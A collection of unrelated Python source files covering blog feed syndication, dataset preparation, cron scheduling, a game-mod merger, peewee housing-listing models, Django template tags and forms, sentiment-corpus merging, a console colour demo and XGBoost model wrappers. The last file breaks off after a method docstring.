    full_path = os.path.join(index_root, path)
    with open(full_path, "r", encoding="utf-8") as entry_file:
        return extract_summary(
            site_root,
            index_root,
            full_path,
            path_date,
            entry_file,
            syndication_url,
            output_dir,
        )
def extract_summary(
    site_root, index_root, path, path_date, markup, syndication_url, output_dir
):
    """Parse *markup*, absolutize/syndicate its URLs, and return its h-entry."""
    doc = bs4.BeautifulSoup(markup, "html5lib")
    replace_urls_with_absolute(doc, "/", site_root, path)
    syndicate_images(doc, syndication_url, output_dir, site_root, path)
    entry_dir = os.path.dirname(os.path.relpath(path, start=index_root))
    return ssite.hentry.extract_hentry(f"{entry_dir}/", path_date, doc)
def summaries_from_paths(site_root, index_root, paths, syndication_url, output_dir):
    """Yield a summary for every (path, date) pair, skipping empty entries."""
    for entry_path, entry_date in paths:
        result = summary_from_path(
            site_root, index_root, entry_path, entry_date, syndication_url, output_dir
        )
        if result is not None:
            yield result
def main(args):
    """Render the syndicated RSS feed (blog.xml) and syndicated image copies.

    Args:
        args: parsed CLI namespace; see add_cli_args for the fields used.
    """
    indexed_dir = args.indexed_dir
    output_dir = args.output_dir
    syndication_url = args.syndication_url
    template_path = args.template
    xml_path = os.path.join(output_dir, "blog.xml")
    # TODO: allow working directories other than site root
    site_root = os.getcwd()
    with open(template_path, "r", encoding="utf-8") as ft:
        jinja_template = jinja2.Template(ft.read())
    blog_paths = ssite.blog.find_paths(indexed_dir)
    # list() replaces a redundant [x for x in ...] comprehension; the unused
    # site_url local was also dropped.
    entries = list(
        summaries_from_paths(
            site_root, indexed_dir, blog_paths, syndication_url, output_dir
        )
    )
    # Sort the entries by date, most-recent posts first.
    entries.sort(key=lambda entry: entry.published, reverse=True)
    with open(xml_path, "wt", encoding="utf-8") as xml_file:
        xml_file.write(jinja_template.render(entries=entries) + "\n")
def add_cli_args(parser):
    """Register the syndicate command's arguments on *parser*."""
    optional_args = (
        (("--output_dir",), {
            "help": "path to write blog.xml and syndicated images to. ",
            "default": "syndicate/",
        }),
        (("--site_url",), {
            "help": "URL of site (must end in /)",
            "default": "https://www.timswast.com/",
        }),
        (("--syndication_url",), {
            "help": "URL of syndication site (must end in /)",
            "default": "http://syndicate.timswast.com/",
        }),
        (("-t", "--template"), {
            "help": "path to index blog.xml template.",
            "default": "syndicate/blog.jinja2.xml",
        }),
    )
    for flags, options in optional_args:
        parser.add_argument(*flags, **options)
    parser.add_argument("indexed_dir", help="path to root of a directory to be indexed")
|
import os
import xml.etree.ElementTree as ET
import cv2
in_dir = './data/imgs/'
img_dir = './data/VOCdevkit2007/VOC2007/JPEGImages/'
anno_dir = './data/VOCdevkit2007/VOC2007/Annotations/'
# BUG FIX: the original opened the ImageSets/Main/ *directory* for writing,
# which raises IsADirectoryError. The image-set list belongs in test.txt,
# matching the cached 'test.txt_annots.pkl' removed below.
fd = open('./data/VOCdevkit2007/VOC2007/ImageSets/Main/test.txt', 'wt')
count = 0
# Copy every .jpg from the input directory into the VOC JPEGImages
# directory under sequential 'in<N>.jpg' names.
dir_temp = os.path.abspath(in_dir)
for (root, dirs, files) in os.walk(dir_temp):
    for file in files:
        # splitext is robust against short names, unlike slicing off 3 chars.
        if os.path.splitext(file)[1].lower() == '.jpg':
            img = cv2.imread(in_dir + file)
            cv2.imwrite(img_dir + 'in' + str(count) + '.jpg', img)
            count = count + 1
# Remove the stale annotation cache; it may legitimately be absent.
try:
    os.remove('./data/VOCdevkit2007/VOC2007/ImageSets/Main/test.txt_annots.pkl')
except OSError:
    print("No such file!")
# Write the image-set list and clone the dummy annotation for each image.
jpeg_root = os.path.abspath(img_dir)
tree = ET.parse(anno_dir + 'dummy.xml')
for (root, dirs, files) in os.walk(jpeg_root):
    for file in files:
        if file[:2] == 'in':
            name = os.path.splitext(file)[0]
            fd.write(name + '\n')
            tree.write(anno_dir + name + '.xml')
fd.close()
|
# -*- coding: utf-8 -*-
from crontab import CronTab
class CrontabControl:
    """Thin wrapper around python-crontab for writing and running jobs."""

    def __init__(self):
        self.cron = CronTab()
        self.job = None
        self.all_job = None

    def write_job(self, command, schedule, file_name):
        """Create a job running *command* on *schedule* and persist it to *file_name*."""
        new_job = self.cron.new(command=command)
        new_job.setall(schedule)
        self.job = new_job
        self.cron.write(file_name)

    def read_jobs(self, file_name):
        """Load every job from the tab file *file_name* into self.all_job."""
        self.all_job = CronTab(tabfile=file_name)

    def monitor_start(self, file):
        """Run the scheduler for the jobs in *file*, reporting each execution."""
        self.read_jobs(file)
        for _result in self.all_job.run_scheduler():
            print('予定していたスケジュールを実行しました。')
def main():
    """Register the daily posting job and start monitoring it."""
    tab_file = 'output.tab'
    controller = CrontabControl()
    controller.write_job('python ./regular_post.py', '0 20 * * *', tab_file)
    controller.monitor_start(tab_file)


if __name__ == '__main__':
    main()
|
import os
import json
from data_classes import SingleCharacter, BaseMod
def _prompt_choice(header, options):
    """Print *header* and numbered *options*; return the index the user typed.

    Extracted because the same numbered-menu prompt appeared twice in
    run_test.
    """
    print(header)
    for i, name in enumerate(options):
        print('%i) ' % i + name)
    return int(input("Please enter a number:"))


def run_test():
    """Interactively merge an AI mod's character into a base mod and save it.

    Reads main_config.json for the installed mods, prompts the user for a
    base mod, an AI mod and a character name, then writes the merged mod to
    the configured output directory.
    """
    # load main config
    with open('main_config.json', 'r') as f:
        cfg = json.load(f, strict=False)
    print('Hello, and Welcome to the CrusaderAI Manager!')
    print('=====')
    num = _prompt_choice('Choose a base-mod:', cfg['installed_base_mods'])
    base = BaseMod(os.path.join('data', 'mod_base', cfg['installed_base_mods'][num]), cfg['vanilla_dir'])
    print('=====')
    num = _prompt_choice('Choose a ai-mod to add to base:', cfg['installed_mods'])
    char = SingleCharacter(os.path.join('data', cfg['installed_mods'][num]))
    print('=====')
    rc = input('Enter a Characters Name to replace ai with:')
    base.update_character(char, rc)
    base.save_base_mod(cfg['out_dir'])
if __name__ == '__main__':
run_test()
|
# -*- coding: utf-8 -*-
#
# @Author: lijiancheng0614
# @Date: 2020-03-06
#
"""Model.
"""
import datetime
from peewee import (BigIntegerField, BooleanField, CharField, CompositeKey,
DateTimeField, FloatField, Model, MySQLDatabase,
PostgresqlDatabase, SqliteDatabase)
from settings import DBENGINE, DBHOST, DBNAME, DBPASSWORD, DBPORT, DBUSER
# Select the peewee database backend from settings.DBENGINE.
if DBENGINE.lower() == 'sqlite3':
    DATABASE = SqliteDatabase(DBNAME)
elif DBENGINE.lower() == 'mysql':
    DATABASE = MySQLDatabase(
        DBNAME,
        host=DBHOST,
        port=DBPORT,
        user=DBUSER,
        passwd=DBPASSWORD,
        charset='utf8',
        use_unicode=True,
    )
elif DBENGINE.lower() == 'postgresql':
    DATABASE = PostgresqlDatabase(
        DBNAME,
        user=DBUSER,
        password=DBPASSWORD,
        host=DBHOST,
        # Consistency fix: the MySQL branch passed DBPORT but this branch
        # silently fell back to the driver's default port.
        port=DBPORT,
        # NOTE(review): charset/use_unicode look MySQL-specific; psycopg2 may
        # reject them -- confirm against a real PostgreSQL deployment.
        charset='utf8',
        use_unicode=True,
    )
else:
    raise AttributeError("Please setup DBENGINE at settings.py")
class BaseModel(Model):
    """Base model.

    All concrete models below inherit the shared DATABASE connection
    through this Meta.
    """
    class Meta:
        """Meta: binds every subclass to the configured database."""
        database = DATABASE
class Community(BaseModel):
    """Residential community record scraped from a housing-listing site.

    One row per community. Most scraped values are stored verbatim as
    strings; ratings are floats and facility flags are booleans.
    """
    # Maps the Chinese labels shown on the listing page to model field names.
    NAME_DICT = {
        u'交易权属': 'trading_right',
        u'产权年限': 'property_right_years',
        u'供暖类型': 'heating_type',
        u'供暖费用': 'heating_cost',
        u'停车费用': 'parking_cost',
        u'固定车位数': 'parking_place_number',
        u'容积率': 'volume_ratio',
        u'建成年代': 'building_finish_year',
        u'建筑类型': 'building_type',
        u'开发企业': 'development_company',
        u'房屋用途': 'house_type',
        u'燃气费用': 'gas_cost',
        u'物业公司': 'property_management_company',
        u'物业电话': 'property_management_phone_number',
        u'物业费用': 'property_management_cost',
        u'用水类型': 'water_use_type',
        u'用电类型': 'power_consumption_type',
        u'绿化率': 'green_coverage',
        u'附近学校': 'nearby_schools',
        u'楼栋总数': 'building_number',
        u'建筑面积': 'built_area',
        u'人车分流': 'separation_pedestrian_vehicular',
        u'占地面积': 'covered_area',
        u'是否封闭': 'close',
        u'总户数': 'house_number',
        u'电梯房': 'elevator',
        u'建筑品质': 'score_building_quality',
        u'户型设计': 'score_apartment_layout_design',
        u'交通条件': 'score_traffic_condition',
        u'教育质量': 'score_education_quality',
        u'商业环境': 'score_business_environment',
        u'花园景观': 'score_garden_View',
        u'物业管理': 'score_property_management',
        u'游泳池': 'is_swimming_pool',
        u'小区花园': 'is_community_garden',
        u'运动场地': 'is_sports_ground',
        u'康乐设施': 'is_recreational_facility',
        u'会所': 'is_club',
        u'健身房': 'is_gym',
        u'大堂': 'is_lobby',
        u'活动中心': 'is_activity_center',
        u'水系': 'is_river_system',
        u'儿童游乐': 'is_playground'
    }
    community_id = BigIntegerField(primary_key=True)
    title = CharField(null=True)  # title
    link = CharField(unique=True)  # page URL (unique per community)
    district = CharField(null=True)  # district
    bizcircle = CharField(null=True)  # business circle
    intro = CharField(null=True)  # introduction
    tags = CharField(null=True)  # tag list
    onsale = CharField(null=True)  # number of units for sale
    onrent = CharField(null=True)  # number of units for rent
    building_number = CharField(null=True)  # total number of buildings
    house_number = CharField(null=True)  # total number of households
    average_unit_price = CharField(null=True)  # average unit price
    building_finish_year = CharField(null=True)  # year built
    built_area = CharField(null=True)  # built (floor) area
    covered_area = CharField(null=True)  # land area
    house_type = CharField(null=True)  # housing use/purpose
    property_right_years = CharField(null=True)  # property-right term (years)
    building_type = CharField(null=True)  # building type
    development_company = CharField(null=True)  # developer
    trading_right = CharField(null=True)  # trading ownership
    property_management_company = CharField(null=True)  # property management company
    property_management_cost = CharField(null=True)  # property management fee
    property_management_phone_number = CharField(null=True)  # property management phone
    heating_type = CharField(null=True)  # heating type
    heating_cost = CharField(null=True)  # heating cost
    water_use_type = CharField(null=True)  # water supply type
    power_consumption_type = CharField(null=True)  # electricity supply type
    parking_place_number = CharField(null=True)  # number of fixed parking spaces
    parking_cost = CharField(null=True)  # parking fee
    gas_cost = CharField(null=True)  # gas cost
    volume_ratio = CharField(null=True)  # plot (floor-area) ratio
    green_coverage = CharField(null=True)  # green coverage ratio
    separation_pedestrian_vehicular = CharField(null=True)  # pedestrian/vehicle separation
    close = CharField(null=True)  # gated community or not
    elevator = CharField(null=True)  # has elevators or not
    nearby_schools = CharField(null=True)  # nearby schools
    score = FloatField(null=True)  # overall rating
    score_building_quality = FloatField(null=True)  # building quality rating
    score_apartment_layout_design = FloatField(null=True)  # apartment layout rating
    score_traffic_condition = FloatField(null=True)  # traffic condition rating
    score_education_quality = FloatField(null=True)  # education quality rating
    score_business_environment = FloatField(null=True)  # business environment rating
    score_garden_View = FloatField(null=True)  # garden view rating
    score_property_management = FloatField(null=True)  # property management rating
    good_point = CharField(null=True)  # strengths
    bad_point = CharField(null=True)  # weaknesses
    is_swimming_pool = BooleanField(null=True)  # swimming pool
    is_community_garden = BooleanField(null=True)  # community garden
    is_sports_ground = BooleanField(null=True)  # sports ground
    is_recreational_facility = BooleanField(null=True)  # recreational facilities
    is_club = BooleanField(null=True)  # clubhouse
    is_gym = BooleanField(null=True)  # gym
    is_lobby = BooleanField(null=True)  # lobby
    is_activity_center = BooleanField(null=True)  # activity center
    is_river_system = BooleanField(null=True)  # water features
    is_playground = BooleanField(null=True)  # children's playground
    valid_date = DateTimeField(default=datetime.datetime.now)  # last updated
class House(BaseModel):
    """Listing of an individual house/apartment for sale."""
    house_id = BigIntegerField(primary_key=True)
    title = CharField(null=True)  # title
    link = CharField(null=True)  # listing URL
    intro = CharField(null=True)  # introduction
    community = CharField(null=True)  # community it belongs to
    total_price = CharField(null=True)  # total price
    unit_price = CharField(null=True)  # unit price
    images = CharField(null=True)  # images
    layout = CharField(null=True)  # apartment layout
    structure = CharField(null=True)  # layout structure
    built_area = CharField(null=True)  # built (floor) area
    usable_area = CharField(null=True)  # usable (interior) area
    orientation = CharField(null=True)  # orientation
    floor = CharField(null=True)  # floor
    building_type = CharField(null=True)  # building type
    building_structure = CharField(null=True)  # building structure
    decoration_type = CharField(null=True)  # decoration/renovation state
    elevator = CharField(null=True)  # elevator equipped
    heating_type = CharField(null=True)  # heating type
    stairs_and_households = CharField(null=True)  # elevator-to-household ratio
    building_finish_year = CharField(null=True)  # year built
    property_right_years = CharField(null=True)  # property-right term (years)
    trading_right = CharField(null=True)  # trading ownership
    listing_time = DateTimeField(null=True)  # listing time
    house_type = CharField(null=True)  # housing use/purpose
    life_years = CharField(null=True)  # house age bracket
    ownership = CharField(null=True)  # ownership of the property rights
    valid_date = DateTimeField(default=datetime.datetime.now)  # last updated
class HistoryPrice(BaseModel):
    """History price: one (house, total_price) observation.

    The composite primary key records a given price for a house at most
    once; `date` keeps the time it was first seen.
    """
    house_id = CharField()
    total_price = CharField()
    date = DateTimeField(default=datetime.datetime.now)
    class Meta:
        """Meta: composite key prevents duplicate (house_id, total_price) rows."""
        primary_key = CompositeKey('house_id', 'total_price')
class Sell(BaseModel):
    """Sale record scraped from the listing site.

    Field semantics are inferred from names; values are stored verbatim as
    strings -- verify against the scraper when in doubt.
    """
    house_id = CharField(primary_key=True)
    title = CharField(null=True)  # listing title
    link = CharField(null=True)  # listing URL
    community = CharField(null=True)  # community name
    years = CharField(null=True)  # presumably build year / age info -- verify
    house_type = CharField(null=True)  # layout/usage
    square = CharField(null=True)  # area
    direction = CharField(null=True)  # orientation
    floor = CharField(null=True)  # floor info
    status = CharField(null=True)  # sale status
    source = CharField(null=True)  # data source
    total_price = CharField(null=True)  # total price
    unit_price = CharField(null=True)  # price per unit area
    dealdate = CharField(null=True)  # deal date
    update_date = DateTimeField(default=datetime.datetime.now)  # last updated
class Rent(BaseModel):
    """Rental listing record.

    Field semantics are inferred from names; values are stored verbatim as
    strings -- verify against the scraper when in doubt.
    """
    house_id = CharField(primary_key=True)
    title = CharField(null=True)  # listing title
    link = CharField(null=True)  # listing URL
    region = CharField(null=True)  # district/region
    zone = CharField(null=True)  # presumably sub-area or layout -- verify
    meters = CharField(null=True)  # presumably area in square meters -- verify
    other = CharField(null=True)  # miscellaneous listing details
    subway = CharField(null=True)  # subway proximity info
    decoration_type = CharField(null=True)  # renovation state
    heating = CharField(null=True)  # heating info
    price = CharField(null=True)  # rent price
    pricepre = CharField(null=True)  # presumably previous/unit price -- verify
    update_date = DateTimeField(default=datetime.datetime.now)  # last updated
def init():
    """Init database.

    Connects, creates the Community table if it does not exist yet
    (safe=True), and disconnects. The other tables are intentionally not
    created here yet.
    """
    DATABASE.connect()
    # DATABASE.create_tables([Community, House, HistoryPrice, Sell, Rent],
    #                        safe=True)
    DATABASE.create_tables([Community], safe=True)
    DATABASE.close()
|
# -*- coding: utf-8 -*-
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
# Authors: Luc LEGER / Coopérative ARTEFACTS <artefacts.lle@gmail.com>
from django import template
from django.utils.translation import gettext_lazy as _
from francoralite_front.errors import APPLICATION_ERRORS
from django.utils.safestring import mark_safe
register = template.Library()
@register.simple_tag
def field_data(label, data, empty=True):
    """Render *label*/*data* as a <dl> block.

    The string "None" is shown as empty; when *empty* is exactly False and
    the data is empty, nothing is rendered at all.
    """
    try:
        label_text = str(label)
    except Exception:
        label_text = label
    try:
        data_text = str(data)
    except Exception:
        data_text = data
    else:
        if data_text == "None":
            data_text = ""
    if empty is False and data_text == "":
        markup = ""
    else:
        markup = (
            "<dl class=\"container_data\"><dt class=\"libelle\">"
            + label_text
            + "</dt> <dd class=\"donnee\" >"
            + data_text
            + "</dd> </dl>"
        )
    return mark_safe(markup)
@register.simple_tag
def field_data_id(field, data, empty=True):
    """Like field_data, but the <dd> carries the form field's DOM id."""
    try:
        label_text = str(field.label)
    except Exception:
        label_text = field.label
    try:
        data_text = str(data)
    except Exception:
        data_text = data
    else:
        if data_text == "None":
            data_text = ""
    if empty is False and data_text == "":
        markup = ""
    else:
        markup = (
            "<dl class=\"container_data\"><dt class=\"libelle\">"
            + label_text
            + "</dt> <dd id=\"" + field.id_for_label + "\" class=\"donnee\" >"
            + data_text
            + "</dd> </dl>"
        )
    return mark_safe(markup)
@register.simple_tag
def field_data_bool(label, data):
    """Render *label* with a checkmark glyph when *data* is exactly True."""
    icon = "glyphicon-ok " if data is True else ""
    markup = (
        "<dl class=\"container_data\"><dt class=\"libelle\">"
        + str(label)
        + "</dt> <dd class=\" center glyphicon "
        + icon
        + "donnee\" >"
        + "</dd> </dl>"
    )
    return mark_safe(markup)
@register.simple_tag
def display_error(error="0"):
    """Render an error indicator plus, for known codes, its include template.

    *error* is an application error code; codes listed in url_error map to a
    dedicated template. "0" or "" means no error and renders nothing useful.
    """
    url_error = {
        'HTTP_API_401': 'inc/non_authentified.html',
        'HTTP_API_404': 'inc/not_present.html',
        'KEY_ERROR': 'inc/key_error.html',
    }
    code = error
    for key, value in url_error.items():
        if error == APPLICATION_ERRORS[key]:
            code = template.loader.get_template(value)
    if error != "0" and error != '':
        # Display the code of the error
        html = "<i>ERR : " + error + "</i>"
        # BUG FIX: the original tested isinstance(code, template.__class__),
        # i.e. against the *module* type, so a loaded template was never
        # rendered. Render whenever a template object replaced the raw
        # error string.
        if not isinstance(code, str):
            html += code.render()
        return html
    return mark_safe(code)
@register.inclusion_tag('inc/modal-delete.html')
def modal_delete():
    """Render the shared delete-confirmation modal; it needs no context."""
    return dict()
@register.inclusion_tag('inc/select-vue-item.html', takes_context=True)
def select_vue_item(context):
    """Forward the optional 'id' from the caller's context to the item select."""
    return {'id': context['id']} if 'id' in context else {}
@register.inclusion_tag('inc/select-vue-collection.html', takes_context=True)
def select_vue_collection(context):
    """Forward the optional 'id' from the caller's context to the collection select."""
    return {'id': context['id']} if 'id' in context else {}
@register.inclusion_tag('inc/buttons-form.html', takes_context=True)
def buttons_form(context):
    """Provide the back-navigation URL (HTTP referer, or '#') to the form buttons."""
    referer = context['request'].META.get('HTTP_REFERER', "#")
    return {'url_back': referer}
@register.filter
def virgule(self):
    """Replace decimal commas with dots in the string form of the value."""
    text = str(self)
    return text.replace(",", ".")
@register.filter
def public_access(self):
    """Translate a public-access code into its human-readable label."""
    choices = {
        'none': _(u"Aucun"),
        'metadata': _(u"Meta-données"),
        'partial': _(u"Partiel"),
        'full': _(u"Complet"),
    }
    return choices[self]
@register.filter
def domains(self):
    """Expand a compact domain-code string (e.g. 'TC') into readable labels.

    Each known single-letter code found in the value contributes its
    translated label; labels are joined with ", ".
    """
    values = str(self)
    DOMAINS = (
        ('T', _(u"Témoignage")),
        ('C', _(u"Chanson")),
        ('A', _(u"Autre expression vocale")),
        ('I', _(u"Expression instrumentale")),
        ('R', _(u"Conte ou récit légendaire"))
    )
    # str.join replaces the original quadratic manual concatenation.
    return ", ".join(str(lib) for code, lib in DOMAINS if code in values)
@register.filter
def get_obj_attr(obj, attr):
    """Template filter for dynamic subscript lookup: obj[attr]."""
    return obj[attr]
@register.inclusion_tag('inc/related-list.html')
def related_list(*args, **kwargs):
    """Build the context for the related-items list include.

    'items' and 'field' are required; the rest fall back to defaults.
    """
    context = {
        'items': kwargs['items'],
        'field': kwargs['field'],
    }
    context['libelle'] = kwargs.get('libelle', "")
    context['url_detail'] = kwargs.get('url_detail', "")
    context['field2'] = kwargs.get('field2', "")
    context['empty'] = kwargs.get('empty', True)
    return context
@register.inclusion_tag('inc/display_documents.html', takes_context=True)
def display_documents(context):
    """Expose 'documents' from the caller's context to the include, when present."""
    return {'documents': context['documents']} if 'documents' in context else {}
@register.inclusion_tag('inc/nakala_button.html')
def nakala_button(*args, **kwargs):
    """Render the Nakala button include; it needs no context."""
    return {}
|
import csv
import pandas as pd
import os
import numpy as np
BASE_DIR = os.getcwd()
def merge_dev_data(result_filename, file_pos, file_neg):
    """Merge positive and negative dev sentences into one labelled CSV.

    Empty lines are dropped after stripping whitespace.

    Args:
        result_filename: path of the CSV to write (columns: text, sentiment).
        file_pos: file with positive dev sentences, one per line.
        file_neg: file with negative dev sentences, one per line.
    """
    merged_data = []
    for filename, sentiment in ((file_pos, "positive"), (file_neg, "negative")):
        # 'with' already closes the file; the original's explicit close()
        # calls inside the with-block were redundant.
        with open(filename, errors="replace") as text:
            merged_data += [(line, sentiment) for line in text]
    df = pd.DataFrame(merged_data, columns=["text", "sentiment"])
    df["text"] = df["text"].apply(lambda x: x.strip())
    # Drop rows whose text was empty after stripping.
    df = df.replace("", np.nan)
    df = df[df["text"].notnull()]
    df.to_csv(result_filename, index=False)
def merge_training_data(result_filename, original_dir, sentiment):
    """Merge every text file in *original_dir* into one labelled CSV.

    Args:
        result_filename: path of the CSV to write (columns: text, sentiment).
        original_dir: directory containing the training text files.
        sentiment: label attached to every line read.
    """
    frames = []
    for filename in os.listdir(original_dir):
        # BUG FIX: the original opened the literal path '(unknown)' instead
        # of interpolating each filename, so no training file was ever read.
        with open(f"{original_dir}/{filename}", errors="replace") as text:
            lines = text.readlines()
            frames.append(pd.DataFrame(list(zip(lines, [sentiment] * len(lines)))))
    # pd.concat replaces DataFrame.append, which was removed in pandas 2.0.
    # Guard the empty-directory case, which previously crashed on the
    # column assignment.
    df = pd.concat(frames) if frames else pd.DataFrame(columns=[0, 1])
    df.columns = ["text", "sentiment"]
    df["text"] = df["text"].apply(lambda x: x.strip())
    df = df.replace("", np.nan)
    df = df.dropna()
    df.to_csv(result_filename, index=False)
# Specify result directory.
# NOTE: result_dir must already exist and must end with '/' because the
# output paths below are built by f-string concatenation.
result_dir = os.path.join(BASE_DIR, "sentiment_analysis/corpora/processed/rottentomatoes/")
# Specify positive and negative training paths
training_positive_path = os.path.join(
    BASE_DIR, "sentiment_analysis/corpora/raw/review_polarity/txt_sentoken/pos"
)
training_negative_path = os.path.join(
    BASE_DIR, "sentiment_analysis/corpora/raw/review_polarity/txt_sentoken/neg"
)
# Merge the training text files for positive and negative
merge_training_data(
    f"{result_dir}positive_training.csv", training_positive_path, "positive"
)
merge_training_data(
    f"{result_dir}negative_training.csv", training_negative_path, "negative"
)
# Merge the development data and save it to a .csv file
dev_positive_path = os.path.join(
    BASE_DIR, "sentiment_analysis/corpora/raw/rt-polaritydata/rt-polaritydata/rt-polarity.pos"
)
dev_negative_path = os.path.join(
    BASE_DIR, "sentiment_analysis/corpora/raw/rt-polaritydata/rt-polaritydata/rt-polarity.neg"
)
merge_dev_data(
    f"{result_dir}development_data.csv", dev_positive_path, dev_negative_path
)
|
from django import forms
from .models import PushInformation, SubscriptionInfo
class SimplePushForm(forms.Form):
    """Form carrying the subscribe/unsubscribe intent for a push subscription."""
    status_type = forms.ChoiceField(choices=[
        ('subscribe', 'subscribe'),
        ('unsubscribe', 'unsubscribe')
    ])
    def save_or_delete(self, subscription, user, status_type):
        """Link *subscription* to *user* (when authenticated), or remove it.

        Ensures a PushInformation row exists for the subscription, then
        deletes both it and the subscription on 'unsubscribe'.

        NOTE(review): ``user.is_authenticated()`` is invoked as a method;
        on Django >= 1.10 it is a property and calling it raises on modern
        versions -- confirm the Django release this app targets.
        """
        data = {}
        if user.is_authenticated():
            data["user"] = user
        data["subscription"] = subscription
        push_info, created = PushInformation.objects.get_or_create(**data)
        # If unsubscribe is called, that means need to delete the browser
        # and notification info from server.
        if status_type == "unsubscribe":
            push_info.delete()
            subscription.delete()
class SubscriptionForm(forms.ModelForm):
    """ModelForm for the browser push-subscription payload."""

    class Meta:
        model = SubscriptionInfo
        fields = ('browser', 'endpoint', 'auth', 'p256dh')

    def get_or_save(self, subscription_data):
        """Return the SubscriptionInfo matching *subscription_data*, creating it if absent."""
        record, _created = SubscriptionInfo.objects.get_or_create(**subscription_data)
        return record
|
#!/usr/bin/env python3
#
# This example demonstrates how to write colored text to STDOUT.
# In this case RGB colors are generated. Please note that this might not work
# on older systems if RGB is not supported.
#
from jk_console import Console
def rangef(start, end, step):
    """Yield the inclusive arithmetic progression start, start+step, ... <= end.

    Works with float steps; note the usual floating-point accumulation
    caveats near the endpoint.
    """
    current = start
    while True:
        if current > end:
            return
        yield current
        current += step
# Paint an HSL swatch: saturation varies per row, hue per column.
Console.clear()
for saturation_pct in rangef(0, 100, 3):
    for hue_pct in rangef(0, 100, 0.8):
        hue = hue_pct / 100.0
        saturation = saturation_pct / 100.0
        cell = Console.BackGround.hsl1(hue, saturation, 0.5)
        print(cell + " ", end="")
    print(Console.RESET)
print()
|
import example_ghactions
def test_cli():
    """Smoke test: the CLI entry point accepts a single numeric argument."""
    example_ghactions.show(["27"])
|
from .lq_conv2d import *
|
# -*- coding: utf-8 -*-
'''Models application.'''
import treatment
# from cross_validation import multi_cross_validation
import numpy as np
import pandas as pd
import xgboost as xgb
from sklearn.metrics import mean_squared_error, r2_score
from sklearn.model_selection import train_test_split
from sklearn.linear_model import RidgeCV, LinearRegression
from sklearn.svm import SVR
#-------------------------------------------------------------------------------
# MODELS
#------------------------------------------------------------------------------
# XGBoost IMPLEMENTATION
# Default hyper-parameters for the easyXGB constructor.
param = {'max_depth': 10, 'eta': 1, 'silent': 1, 'subsample': 0.8,
         'reg_alpha': 0.7, 'tree_method': 'auto'}


class easyXGB:
    '''Wrapper to use XGBooster models with sklearn methods.

    Implements fit, predict and score so the booster can be dropped into
    sklearn-style code.
    '''

    def __init__(self, load=0, params_=param, scorer='MSE'):
        """Build the wrapper.

        Args:
            load: model slot 1-4 to load from 'reg_<i>.model'; 0 trains fresh.
            params_: XGBoost parameter dict (defaults to module-level param).
            scorer: 'MSE' or 'R2'; selects the metric used by score().
        """
        # BUG FIX: copy the dict. The original stored a reference to the
        # shared module-level default, so set_params() on one instance
        # silently mutated the defaults seen by every other instance.
        self.params = {} if (params_ is None) else dict(params_)
        self._scorer = scorer
        if load in range(1, 5):
            self.model = xgb.Booster()
            self.model.load_model('reg_{i}.model'.format(i=load))

    def set_params(self, **kwargs):
        """Update individual XGBoost parameters on this instance only."""
        self.params.update(kwargs)

    def fit(self, X_train, y_train, **parameters):
        '''Wrapper for xgb fit function.

        Fit the easyXGB model to y_train and X_train; extra keyword
        arguments are merged into the parameter dict first.'''
        self.set_params(**parameters)
        dtrain = xgb.DMatrix(X_train, label=y_train)
        self.model = xgb.train(params=self.params, dtrain=dtrain)

    def predict(self, X_test):
        '''Wrapper for xgb prediction function.

        Returns predicted values for X_test observations.'''
        dtest = xgb.DMatrix(X_test)
        return self.model.predict(dtest)

    def score(self, X_test, y_test):
        """Score predictions on X_test against y_test with the chosen scorer."""
        y_pred = self.predict(X_test)
        if self._scorer == 'MSE':
            return mean_squared_error(y_test, y_pred)
        elif self._scorer == 'R2':
            return r2_score(y_test, y_pred)
        else:
            raise NotImplementedError

    def save(self, number):
        """Persist the booster into model slot *number* (1-4)."""
        if number in range(1, 5):
            self.model.save_model('reg_{i}.model'.format(i=number))
        else:
            raise NotImplementedError
class XGBImplement:
    '''Model bundling one easyXGB booster per response variable.

    Trains four boosters (one per rate constant) on data loaded from
    treatment.data_initialization, then records train/test scores.

    Methods:
    predict(self, X_test)		Predict values for the log of 'k1_bwd_effective','k1_fwd_effective', 'k2_bwd_effective','k2_fwd_effective' using our model.
    Variables:
    scores		Contains scores on test and train predictions as a pandas DataFrame.
    '''
    def __init__(self, random_state = 33, realization_split = False):
        # Load the four responses, the feature matrix and the realization ids.
        y1, y2, y3, y4, X, realization = treatment.data_initialization(realiz=True)
        # These columns are excluded from the XGB feature set.
        X = X.drop(columns=['sigma_mass_0.0', 'sigma_mass_0.825', 'enzyme_concentration'])
        X = X.values
        # Hyper-parameters were tuned per response (presumably via cross
        # validation elsewhere -- see the commented-out import at the top).
        self.k1_bkw_model = easyXGB(params_= {'reg_alpha': 0.33684210526315794, 'eta': 0.7, 'max_depth': 9, 'subsample': 1.0}, scorer='R2')
        self.k1_fwd_model = easyXGB(params_= {'reg_alpha': 0.9, 'eta': 0.6, 'max_depth': 4, 'subsample': 1.0}, scorer='R2')
        self.k2_bkw_model = easyXGB(params_= {'reg_alpha': 0.95, 'eta': 0.65, 'max_depth': 4, 'subsample': 1.0}, scorer='R2')
        self.k2_fwd_model = easyXGB(params_= {'reg_alpha': 0.4, 'eta': 0.66, 'max_depth': 10, 'subsample': 1.0}, scorer='R2')
        indices = ['k1_bwd_effective','k1_fwd_effective', 'k2_bwd_effective','k2_fwd_effective']
        self.scores = pd.DataFrame({'R^2 train score': 4*[0], 'R^2 test score': 4*[0],
                                    'MSE train score': 4*[0], 'MSE test score': 4*[0]},
                                   index = indices)
        iterator = [(self.k1_bkw_model, y1, indices[0]), (self.k1_fwd_model, y2, indices[1]),
                    (self.k2_bkw_model, y3, indices[2]), (self.k2_fwd_model, y4, indices[3])]
        # Fit each model on a 60/40 split (optionally grouped by realization)
        # and record its train/test R^2 and MSE.
        for model, y, index in iterator:
            X_train, X_test, y_train, y_test = treatment.train_test_split(X, y, test_size=0.4, random_state = random_state) if not realization_split else treatment.train_test_split_realiz(X, y, realization, test_size=0.4, random_state = random_state)
            model.fit(X_train, y_train)
            y_pred_tr = model.predict(X_train)
            y_pred_te = model.predict(X_test)
            #['R^2 train score', 'R^2 test score', 'MSE train score', 'MSE test score']
            self.scores.loc[index] = model.score(X_train, y_train), model.score(X_test, y_test), mean_squared_error(y_train, y_pred_tr), mean_squared_error(y_test, y_pred_te)
    def predict(self, X_test):
        ''' Predict values for the log of 'k1_bwd_effective','k1_fwd_effective', 'k2_bwd_effective','k2_fwd_effective' using our model.

        Returns pandas DataFrame with columns k1_bwd_pred, k1_fwd_pred, k2_bwd_pred, k2_fwd_pred (logscaled)
        '''
